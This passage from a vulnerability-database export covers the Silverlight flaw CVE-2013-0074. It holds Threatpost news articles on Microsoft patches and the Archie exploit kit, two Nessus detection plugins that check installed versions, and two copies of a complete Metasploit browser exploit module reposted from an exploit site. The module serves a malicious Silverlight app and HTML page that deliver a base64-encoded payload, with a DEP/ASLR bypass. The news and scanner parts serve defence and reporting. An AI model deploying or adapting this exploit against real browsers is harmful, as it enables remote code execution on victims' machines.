available.\n\n\u201cProviding security updates to Windows Store apps more frequently will allow us to add new functionality, fix issues and improve security. This will also help developers to avoid introducing new issues during the update process,\u201d Microsoft Security Response Center senior director Mike Reavey wrote in a [blogpost](<http://blogs.technet.com/b/msrc/archive/2013/03/12/microsoft-apps-updates-policy.aspx>) today.\n\nAs for IE, the security of the browser has been headline news for much of the year, starting with watering hole attacks against a number of political and government sites right through last week\u2019s Pwn2Own contest at the CanSecWest Conference in Vancouver. Researchers at security company [VUPEN compromised IE 10 running on a Windows 8 machine](<https://threatpost.com/pwn2own-browser-exploits-getting-harder-more-expensive-find-030613/>) to earn $100,000 in prize money. While similar vulnerabilities were exploited in Firefox and Chrome during Pwn2Own, Mozilla and Google were able to deliver patches within days of the contest, unlike Microsoft.\n\nToday\u2019s IE patches, [MS13-021](<https://technet.microsoft.com/en-us/security/bulletin/ms13-021>), address nine use-after free vulnerabilities, one of which ([CVE-2013-1288](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1288>)) is being exploited in the wild; users have to be lured via IE to a site controlled by the attacker that is hosting an exploit. The exploit was built for a Metasploit module written one month ago for [MS13-009](<https://technet.microsoft.com/en-us/security/bulletin/ms13-009>), which was patched in February, and [still works against a fully patched version of IE 8](<http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf>).\n\n\u201cThe attack vector is through a webpage that anybody with access to Metasploit can set up quite easily,\u201d said Qualys CTO Wolfgang Kandek. \u201cYou are going to want to patch this as quickly as possible.\u201d\n\nMicrosoft also addressed a trio of Kernel-Mode Driver vulnerabilities in [MS13-027](<http://technet.microsoft.com/en-us/security/bulletin/MS13-027>) that could be exploited by an attacker using a malicious USB drive to gain root access on a machine. Known as the evil maid attack, these types can be pulled off by anyone with physical access to a machine. Attacks such as Stuxnet were also initiated via infected USB sticks.\n\n\u201cWhile this isn\u2019t the first issue to leverage physical access and USB devices, it is different in that it doesn\u2019t require a machine to be logged on. It also provides kernel-level code execution where previous attacks only allowed code execution at the logged-on level,\u201d wrote Dustin Childs, group manager, Microsoft Trustworthy Computing.\n\n\u201cBecause of this, someone with casual physical access, such as a custodian sweeping your office at night or a security guard making his rounds, could simply plug in a USB device to perform any action as an administrator,\u201d Childs said. \u201cThis is much different than _unrestricted__ _physical access, where that same person would have to steal your machine, boot it using removable media, and decrypt files on the hard drive.\u201d\n\nThree other critical bulletins were released today. [MS13-022](<http://technet.microsoft.com/en-us/security/bulletin/ms13-022>) patches a remote code execution vulnerability in Microsoft Silverlight; users would have to visit a website hosting a malicious Silverlight application in order be exploited. The vulnerability, known as a [double dereference vulnerability](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0074>), could allow Silverlight applications to access memory in an unsafe manner, Microsoft said.\n\nMicrosoft also patched another remote code execution flaw in Microsoft Visio Viewer 2010. [MS13-023](<http://technet.microsoft.com/en-us/security/bulletin/ms13-023>) describes how malicious Visio files could exploit a Visio Viewer Tree Object Type Confusion vulnerability, which lies in the way the viewer handles memory when rendering Visio files.\n\nThe final critical bulletin, [MS13-024](<http://technet.microsoft.com/en-us/security/bulletin/ms13-024>), is for SharePoint. The patch addresses four vulnerabilities, including a cross-site scripting bug, that could lead to privilege escalation if a user follows a URL to a malicious SharePoint site. Qualys\u2019 Kandek said an attacker could spike a search query with malicious code to initiate an exploit. \u201cLater when an admin reviews the queries, the code is run in the admin\u2019s context giving full control to the attacker,\u201d Kandek said.\n\nThe remaining tw0 bulletins were rated important and are both information disclosure vulnerabilities in Microsoft OneNote, [MS13-025](<http://go.microsoft.com/fwlink/?LinkId=282355>), and Office Outlook for Mac, [MS13-026](<http://go.microsoft.com/fwlink/?LinkId=280673>).\n\n_This article was updated to clarify that one of the IE vulnerabilities was previously disclosed, and is not being exploited in the wild._\n", "modified": "2013-05-08T14:22:48", "published": "2013-03-12T18:28:50", "id": "THREATPOST:616CAD98C622760276F2D4E79A091E01", "href": "https://threatpost.com/critical-ie-windows-kernel-flaws-patched-031213-0/77615/", "type": "threatpost", "title": "Critical IE, Windows Kernel Flaws Patched", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:09", "bulletinFamily": "info", "description": "A relatively new exploit kit that borrows modules copied from the Metasploit Framework and exploits any older versions of Adobe Flash, Reader and, Silverlight the user may be using has begun to make the rounds.\n\nJaime Blasco, the director of AlienVault Labs dug deeper into kit, known as Archie, on the [company\u2019s blog yesterday](<http://www.alienvault.com/open-threat-exchange/blog/archie-just-another-exploit-kit>).\n\nFirst discovered by [EmergingThreats in August](<http://emergingthreats.net/daily-ruleset-update-summary-08132014/>), Archie is apparently one of the more basic exploit kits on the market.\n\n\u201cWhen the victim lands on the main page, Archie uses the PluginDetect Javascript library to extract information,\u201d Blasco says, regarding Archie\u2019s functionality.\n\nIn addition to Flash and Reader, the kit also checks victims\u2019 machines to see if its running a 64-bit version of Internet Explorer.\n\nIf caught running an outdated version of Flash it will load one of two exploits, including CVE-2014-0497, a zero day that hackers used to deploy password-grabbing Trojans in China [back in February](<http://threatpost.com/details-emerge-on-latest-adobe-flash-zero-day-exploit/104068>). Hackers used the other Flash exploit the kit employs, CVE-2014-0515, in attacks against Syrians [in April](<http://threatpost.com/flash-zero-day-used-to-target-victims-in-syria/105726>).\n\nThe IE vulnerability it checks for, [CVE-2013-2551](<http://threatpost.com/microsoft-patches-department-of-labor-pwn2own-ie-vulnerabilities>), is the same use-after-free memory corruption vulnerability that VUPEN dug up at Pwn2Own 2013.\n\nThe Silverlight vulnerability Archie exploits is an old one as well. Despite being patched in March 2013, the kit exploits a vulnerability, [CVE-2013-0074](<threatpost.com/netflixers-beware-angler-exploit-kit-targets-silverlight-vulnerability/102968>), that targets Silverlight 5 and opens up systems running it up to remote code execution.\n\n\u201cArchie contains shellcode in different formats that is sent to the different exploit modules generated by Metasploit when it loads them,\u201d Blasco wrote.\n\nThe shellcode then kickstarts a basic download and execute payload, which Blasco said comes from the same IP address as one being used for a .NET click fraud bot.\n\nA bevy of new exploit kits have been circulating in the 10 or so months since authorities in Russia [arrested Paunch](<http://threatpost.com/blackhole-exploit-kit-author-arrested-in-russia/102537>), the Blackhole Exploit Kit\u2019s creator. [Blackhole and Cool](<http://threatpost.com/blackhole-and-cool-exploit-kits-nearly-extinct/103034>), another Exploit Kit assumed to have been crafted by Paunch, dissolved soon after.\n\nMalicious ads on Yahoo were found linking European users to one of those kits, Magnitude, in January while this summer, men\u2019s lifestyle site AskMen.com was spotted directing users to the Nuclear Pack Exploit Kit.\n\nArchie joins another exploit kit, Angler, in targeting Silverlight vulnerabilities. Silverlight, Microsoft\u2019s app framework, is perhaps best known for powering media streaming services like Netflix. [Java.com and TMZ.com](<http://threatpost.com/java-com-tmz-serving-malvertising-redirects-to-angler-exploit-kit/107943>) were found sending users to sites peddling Angler last month.\n", "modified": "2014-09-16T21:25:57", "published": "2014-09-16T17:25:57", "id": "THREATPOST:9928E4032CF09647D7486B6AB9996982", "href": "https://threatpost.com/archie-exploit-kit-targets-adobe-silverlight-vulnerabilities/108317/", "type": "threatpost", "title": "Archie Exploit Kit Spotted Leveraging Adobe, Silverlight Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-01-16T20:15:51", "bulletinFamily": "scanner", "description": "The version of Microsoft Silverlight installed on the remote host\nreportedly incorrectly checks a memory pointer when rendering an HTML\nobject, which could allow a specially crafted application to access\nmemory in an unsafe fashion.\n\nIf an attacker could trick a user on the affected system into visiting a\nwebsite hosting a malicious Silverlight application, the attacker could\nleverage this vulnerability to execute arbitrary code on the affected\nsystem, subject to the user's privileges.", "modified": "2018-07-14T00:00:00", "published": "2013-03-12T00:00:00", "id": "MACOSX_MS13-022.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=65216", "title": "MS13-022: Vulnerability in Silverlight Could Allow Remote Code Execution (2814124) (Mac OS X)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65216);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\"CVE-2013-0074\");\n script_bugtraq_id(58327);\n script_xref(name:\"MSFT\", value:\"MS13-022\");\n script_xref(name:\"MSKB\", value:\"2814124\");\n\n script_name(english:\"MS13-022: Vulnerability in Silverlight Could Allow Remote Code Execution (2814124) (Mac OS X)\");\n script_summary(english:\"Checks version of Microsoft Silverlight\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A multimedia application framework installed on the remote Mac OS X\nhost is affected a remote code execution vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Microsoft Silverlight installed on the remote host\nreportedly incorrectly checks a memory pointer when rendering an HTML\nobject, which could allow a specially crafted application to access\nmemory in an unsafe fashion.\n\nIf an attacker could trick a user on the affected system into visiting a\nwebsite hosting a malicious Silverlight application, the attacker could\nleverage this vulnerability to execute arbitrary code on the affected\nsystem, subject to the user's privileges.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/bulletin/ms13-022\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a patch for Silverlight 5.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:silverlight\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_silverlight_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Silverlight/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nkb_base = \"MacOSX/Silverlight\";\nget_kb_item_or_exit(kb_base+\"/Installed\");\npath = get_kb_item_or_exit(kb_base+\"/Path\", exit_code:1);\nversion = get_kb_item_or_exit(kb_base+\"/Version\", exit_code:1);\n\n\nbulletin = \"MS13-022\";\nfixed_version = \"\";\n\n# nb: Multiple installs of Silverlight are not possible.\nif (version =~ \"^5\\.\")\n{\n fixed_version = \"5.1.20125.0\";\n kb = \"2814124\";\n}\n\nif (fixed_version && ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)\n{\n if (defined_func(\"report_xml_tag\")) report_xml_tag(tag:bulletin, value:kb);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : '+fixed_version +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The Microsoft Silverlight \"+version+\" install is not reported to be affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:15:51", "bulletinFamily": "scanner", "description": "The version of Microsoft Silverlight installed on the remote host\nreportedly incorrectly checks a memory pointer when rendering an HTML\nobject, which could allow a specially crafted application to access\nmemory in an unsafe fashion.\n\nIf an attacker could trick a user on the affected system into visiting a\nwebsite hosting a malicious Silverlight application, the attacker could\nleverage this vulnerability to execute arbitrary code on the affected\nsystem, subject to the user's privileges.", "modified": "2018-11-15T00:00:00", "published": "2013-03-12T00:00:00", "id": "SMB_NT_MS13-022.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=65211", "title": "MS13-022: Vulnerability in Microsoft Silverlight Could Allow Remote Code Execution (2814124)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(65211);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2013-0074\");\n script_bugtraq_id(58327);\n script_xref(name:\"MSFT\", value:\"MS13-022\");\n script_xref(name:\"MSKB\", value:\"2814124\");\n\n script_name(english:\"MS13-022: Vulnerability in Microsoft Silverlight Could Allow Remote Code Execution (2814124)\");\n script_summary(english:\"Checks version of Silverlight.exe\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A browser enhancement on the remote Windows host could allow arbitrary\ncode execution.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Microsoft Silverlight installed on the remote host\nreportedly incorrectly checks a memory pointer when rendering an HTML\nobject, which could allow a specially crafted application to access\nmemory in an unsafe fashion.\n\nIf an attacker could trick a user on the affected system into visiting a\nwebsite hosting a malicious Silverlight application, the attacker could\nleverage this vulnerability to execute arbitrary code on the affected\nsystem, subject to the user's privileges.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-022\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for Silverlight 5.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:silverlight\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"silverlight_detect.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS13-022';\nkb = \"2814124\";\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\n# Silverlight 5.x\nver = get_kb_item(\"SMB/Silverlight/Version\");\nfix = '5.1.20125.0';\n\nif (!isnull(ver) && ver =~ '^5\\\\.' && ver_compare(ver:ver, fix:fix) == -1)\n{\n path = get_kb_item(\"SMB/Silverlight/Path\");\n report +=\n '\\n Product : Microsoft Silverlight' +\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix + '\\n';\n hotfix_add_report(report, bulletin:bulletin, kb:kb);\n\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-04-03T01:35:16", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2013-11-27T00:00:00", "published": "2013-11-27T00:00:00", "id": "1337DAY-ID-21575", "href": "https://0day.today/exploit/description/21575", "type": "zdt", "title": "MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n \r\n MANIFEST = <<-EOS\r\n<Deployment xmlns=\"http://schemas.microsoft.com/client/2007/deployment\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" EntryPointAssembly=\"SilverApp1\" EntryPointType=\"SilverApp1.App\" RuntimeVersion=\"4.0.50826.0\">\r\n <Deployment.Parts>\r\n <AssemblyPart x:Name=\"SilverApp1\" Source=\"SilverApp1.dll\" />\r\n </Deployment.Parts>\r\n</Deployment>\r\n EOS\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on\r\n the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an\r\n unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible\r\n to dereference arbitrary memory which easily leverages to arbitrary code execution. In order\r\n to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class\r\n from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP\r\n SP3 / Windows 7 SP1 on both x32 and x64 architectures.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'James Forshaw', # RCE Vulnerability discovery\r\n 'Vitaliy Toropov', # Info Leak discovery, original exploit, all the hard work\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-0074' ],\r\n [ 'CVE', '2013-3896' ],\r\n [ 'OSVDB', '91147' ],\r\n [ 'OSVDB', '98223' ],\r\n [ 'BID', '58327' ],\r\n [ 'BID', '62793' ],\r\n [ 'MSB', 'MS13-022' ],\r\n [ 'MSB', 'MS13-087' ],\r\n [ 'URL', 'http://packetstormsecurity.com/files/123731/' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f',\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X86, ARCH_X86_64],\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :ua_name => Msf::HttpClients::IE\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows x86',\r\n {\r\n 'arch' => ARCH_X86\r\n }\r\n ],\r\n [ 'Windows x64',\r\n {\r\n 'arch' => ARCH_X86_64\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Mar 12 2013\",\r\n 'DefaultTarget' => 0))\r\n \r\n end\r\n \r\n def setup\r\n @xap_name = \"#{rand_text_alpha(5 + rand(5))}.xap\"\r\n @dll_name = \"#{rand_text_alpha(5 + rand(5))}.dll\"\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.xap\" ), \"rb\") { |f| @xap = f.read }\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.dll\" ), \"rb\") { |f| @dll = f.read }\r\n @xaml = MANIFEST.gsub(/SilverApp1\\.dll/, @dll_name)\r\n super\r\n end\r\n \r\n def exploit_template(cli, target_info)\r\n \r\n my_payload = get_payload(cli, target_info)\r\n \r\n # Align to 4 bytes the x86 payload\r\n if target_info[:arch] == ARCH_X86\r\n while my_payload.length % 4 != 0\r\n my_payload = \"\\x90\" + my_payload\r\n end\r\n end\r\n \r\n my_payload = Rex::Text.encode_base64(my_payload)\r\n \r\n html_template = <<-EOF\r\n<html>\r\n<!-- saved from url=(0014)about:internet -->\r\n<head>\r\n <title>Silverlight Application</title>\r\n <style type=\"text/css\">\r\n html, body { height: 100%; overflow: auto; }\r\n body { padding: 0; margin: 0; }\r\n #form1 { height: 99%; }\r\n #silverlightControlHost { text-align:center; }\r\n </style>\r\n</head>\r\n<body>\r\n <form id=\"form1\" runat=\"server\" >\r\n <div id=\"silverlightControlHost\">\r\n <object data=\"data:application/x-silverlight-2,\" type=\"application/x-silverlight-2\" width=\"100%\" height=\"100%\">\r\n <param name=\"source\" value=\"<%= @xap_name %>\"/>\r\n <param name=\"background\" value=\"white\" />\r\n <param name=\"InitParams\" value=\"payload=<%= my_payload %>\" />\r\n </object>\r\n </div>\r\n </form>\r\n</body>\r\n</html>\r\nEOF\r\n \r\n return html_template, binding()\r\n end\r\n \r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"request: #{request.uri}\")\r\n if request.uri =~ /#{@xap_name}$/\r\n print_status(\"Sending XAP...\")\r\n send_response(cli, @xap, { 'Content-Type' => 'application/x-silverlight-2', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /#{@dll_name}$/\r\n print_status(\"Sending DLL...\")\r\n send_response(cli, @dll, { 'Content-Type' => 'application/octect-stream', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /AppManifest.xaml$/\r\n print_status(\"Sending XAML...\")\r\n send_response(cli, @xaml, { 'Content-Type' => 'text/xaml', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n else\r\n print_status(\"Sending HTML...\")\r\n send_exploit_html(cli, exploit_template(cli, target_info))\r\n end\r\n end\r\n \r\nend\n\n# 0day.today [2018-04-03] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21575"}, {"lastseen": "2018-03-13T01:18:27", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible to dereference arbitrary memory which easily leverages to arbitrary code execution. In order to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class from System.Windows.dll. This Metasploit module has been tested successfully on IE6 - IE10, Windows XP SP3 / Windows 7 SP1 on both x32 and x64 architectures.", "modified": "2013-11-26T00:00:00", "published": "2013-11-26T00:00:00", "id": "1337DAY-ID-21573", "href": "https://0day.today/exploit/description/21573", "type": "zdt", "title": "Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n MANIFEST = <<-EOS\r\n<Deployment xmlns=\"http://schemas.microsoft.com/client/2007/deployment\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" EntryPointAssembly=\"SilverApp1\" EntryPointType=\"SilverApp1.App\" RuntimeVersion=\"4.0.50826.0\">\r\n <Deployment.Parts>\r\n <AssemblyPart x:Name=\"SilverApp1\" Source=\"SilverApp1.dll\" />\r\n </Deployment.Parts>\r\n</Deployment>\r\n EOS\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on\r\n the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an\r\n unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible\r\n to dereference arbitrary memory which easily leverages to arbitrary code execution. In order\r\n to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class\r\n from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP\r\n SP3 / Windows 7 SP1 on both x32 and x64 architectures.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'James Forshaw', # RCE Vulnerability discovery\r\n 'Vitaliy Toropov', # Info Leak discovery, original exploit, all the hard work\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-0074' ],\r\n [ 'CVE', '2013-3896' ],\r\n [ 'OSVDB', '91147' ],\r\n [ 'OSVDB', '98223' ],\r\n [ 'BID', '58327' ],\r\n [ 'BID', '62793' ],\r\n [ 'MSB', 'MS13-022' ],\r\n [ 'MSB', 'MS13-087' ],\r\n [ 'URL', 'http://packetstormsecurity.com/files/123731/' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f',\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X86, ARCH_X86_64],\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :ua_name => Msf::HttpClients::IE\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows x86',\r\n {\r\n 'arch' => ARCH_X86\r\n }\r\n ],\r\n [ 'Windows x64',\r\n {\r\n 'arch' => ARCH_X86_64\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Mar 12 2013\",\r\n 'DefaultTarget' => 0))\r\n\r\n end\r\n\r\n def setup\r\n @xap_name = \"#{rand_text_alpha(5 + rand(5))}.xap\"\r\n @dll_name = \"#{rand_text_alpha(5 + rand(5))}.dll\"\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.xap\" ), \"rb\") { |f| @xap = f.read }\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.dll\" ), \"rb\") { |f| @dll = f.read }\r\n @xaml = MANIFEST.gsub(/SilverApp1\\.dll/, @dll_name)\r\n super\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n\r\n my_payload = get_payload(cli, target_info)\r\n\r\n # Align to 4 bytes the x86 payload\r\n if target_info[:arch] == ARCH_X86\r\n while my_payload.length % 4 != 0\r\n my_payload = \"\\x90\" + my_payload\r\n end\r\n end\r\n\r\n my_payload = Rex::Text.encode_base64(my_payload)\r\n\r\n html_template = <<-EOF\r\n<html>\r\n<!-- saved from url=(0014)about:internet -->\r\n<head>\r\n <title>Silverlight Application</title>\r\n <style type=\"text/css\">\r\n html, body { height: 100%; overflow: auto; }\r\n body { padding: 0; margin: 0; }\r\n #form1 { height: 99%; }\r\n #silverlightControlHost { text-align:center; }\r\n </style>\r\n</head>\r\n<body>\r\n <form id=\"form1\" runat=\"server\" >\r\n <div id=\"silverlightControlHost\">\r\n <object data=\"data:application/x-silverlight-2,\" type=\"application/x-silverlight-2\" width=\"100%\" height=\"100%\">\r\n <param name=\"source\" value=\"<%= @xap_name %>\"/>\r\n <param name=\"background\" value=\"white\" />\r\n <param name=\"InitParams\" value=\"payload=<%= my_payload %>\" />\r\n </object>\r\n </div>\r\n </form>\r\n</body>\r\n</html>\r\nEOF\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"request: #{request.uri}\")\r\n if request.uri =~ /#{@xap_name}$/\r\n print_status(\"Sending XAP...\")\r\n send_response(cli, @xap, { 'Content-Type' => 'application/x-silverlight-2', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /#{@dll_name}$/\r\n print_status(\"Sending DLL...\")\r\n send_response(cli, @dll, { 'Content-Type' => 'application/octect-stream', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /AppManifest.xaml$/\r\n print_status(\"Sending XAML...\")\r\n send_response(cli, @xaml, { 'Content-Type' => 'text/xaml', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n else\r\n print_status(\"Sending HTML...\")\r\n send_exploit_html(cli, exploit_template(cli, target_info))\r\n end\r\n end\r\n\r\nend\n\n# 